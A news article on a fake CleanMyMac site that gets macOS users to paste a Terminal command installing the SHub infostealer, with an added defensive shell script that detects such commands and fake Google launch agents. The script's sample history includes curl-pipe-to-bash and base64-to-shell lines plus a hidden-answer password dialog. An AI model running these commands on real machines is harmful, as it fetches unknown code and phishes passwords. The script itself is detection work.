Cybercriminals have started targeting macOS users with more advanced tools, and a new malware campaign shows how attackers now rely on deception rather than software vulnerabilities to steal sensitive data. The attack spreads through a fake utility website that tricks users into installing a malicious program designed to steal passwords, files, and cryptocurrency wallet information from Mac computers.
The operation impersonates CleanMyMac, a popular Mac optimization tool developed by MacPaw. Attackers built a convincing clone of the official website and hosted it on a look-alike domain, so users who land on it can easily mistake it for the real product and follow its installation instructions without suspecting anything unusual.
Security researchers at Malwarebytes uncovered the campaign and warned that attackers rely on social engineering rather than technical exploits. As the researchers explained, “Instead of exploiting a vulnerability, it tricks the user into running the malware themselves.”
Fake installer hides an infostealer
Instead of offering a normal installer to download, the fake site instructs visitors to open Terminal and paste a command. That command silently downloads SHub Stealer, a macOS infostealer built to collect browser passwords, Apple Keychain data, cookies, cryptocurrency wallet files, and messaging-app session files.
Once running, the malware displays a fake macOS password prompt. Because the account password unlocks the Keychain and other protected data, supplying it lets the malware extract stored credentials, tokens, and wallet information.
The malware also installs a hidden background process disguised as a Google update service. This persistent component gives attackers a way to run commands on the infected Mac and keeps them in control until it is found and removed.
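The infection chain above leaves two artifacts a responder can hunt for: a fetch-and-execute command in the victim's shell history, and a launch agent whose label claims to be a Google updater but whose binary lives somewhere Google never installs to. The script below is an added example written for this article; it is not code from the Malwarebytes report, from MacPaw, or from the malware. The history patterns, the list of "expected" Google paths, the use of `osascript ... with hidden answer` as the way a fake password prompt is typically produced, and every sample file it writes are assumptions made for illustration.

```sh
#!/bin/sh
# Added example (not from the Malwarebytes report or MacPaw): two host-side
# heuristics for the behaviours described above. Patterns, paths and the
# constructed sample data are all assumptions for illustration.

# 1. Count shell-history lines that pipe a download straight into a shell,
#    decode base64 into a shell, or pop a hidden-answer AppleScript dialog.
#    Handles zsh extended-history lines (": <ts>:0;<cmd>") as well as bash.
flag_paste_commands() {
    # $1 = path to a history file, e.g. ~/.zsh_history (assumed location)
    grep -E -c \
        '(curl|wget)[^|]*[|][[:space:]]*(sh|bash|zsh)([[:space:]]|$)|base64[[:space:]]+(-d|-D|--decode)[^|]*[|][[:space:]]*(sh|bash|zsh)([[:space:]]|$)|osascript.*hidden answer' \
        "$1" || true   # grep -c prints 0 but exits 1 when nothing matches
}

# 2. Print the first <string> that follows a given <key> in an XML plist.
#    Assumes key and value on separate lines, as `plutil -convert xml1` emits.
plist_value() {
    awk -v key="<key>$2</key>" '
        index($0, key) { want = 1; next }
        want && match($0, /<string>[^<]*<\/string>/) {
            print substr($0, RSTART + 8, RLENGTH - 17); exit
        }' "$1"
}

# Returns 0 (suspicious) when the Label mentions Google but the program path
# is outside the directories Google's own updater uses (assumed allow-list).
launch_agent_is_suspicious() {
    label=$(plist_value "$1" Label | tr 'A-Z' 'a-z')
    prog=$(plist_value "$1" ProgramArguments)
    case "$label" in *google*) ;; *) return 1 ;; esac
    case "$prog" in
        /Library/Google/*|"$HOME"/Library/Google/*|/Applications/Google*|"/Library/Application Support/Google/"*)
            return 1 ;;
    esac
    return 0
}

# Constructed sample data so the example runs offline. $1 = output directory.
make_samples() {
    cat > "$1/history" <<'EOF'
: 1700000000:0;ls -la ~/Downloads
: 1700000010:0;curl -fsSL https://cleanmymac.invalid/install.sh | bash
: 1700000020:0;brew update
: 1700000030:0;echo 'ZWNobyBoaQ==' | base64 -d | sh
: 1700000040:0;osascript -e 'display dialog "macOS needs your password" default answer "" with hidden answer'
EOF
    cat > "$1/benign.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.google.keystone.agent</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Resources/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent</string>
    </array>
</dict>
</plist>
EOF
    cat > "$1/fake.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.google.update.service</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/Shared/.gupdate/updater</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
EOF
}

# Stand-alone demo over the constructed samples.
dir=$(mktemp -d)
make_samples "$dir"
echo "suspicious history lines: $(flag_paste_commands "$dir/history")"
for p in "$dir/benign.plist" "$dir/fake.plist"; do
    if launch_agent_is_suspicious "$p"; then echo "SUSPICIOUS: $p"; else echo "ok: $p"; fi
done
rm -r "$dir"
```

On a real Mac, point `flag_paste_commands` at `~/.zsh_history` and loop `launch_agent_is_suspicious` over `~/Library/LaunchAgents`, `/Library/LaunchAgents` and `/Library/LaunchDaemons`; convert binary plists first with `plutil -convert xml1 -o - <file>`. Both checks are heuristics: a label match plus an odd path is a lead to pull the binary and inspect it, not proof of compromise, and a legitimate administrator may well have a `curl | sh` in their history.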
Security researchers warn that macOS is becoming a larger target for cybercriminal groups as attack tools grow more organized and professional.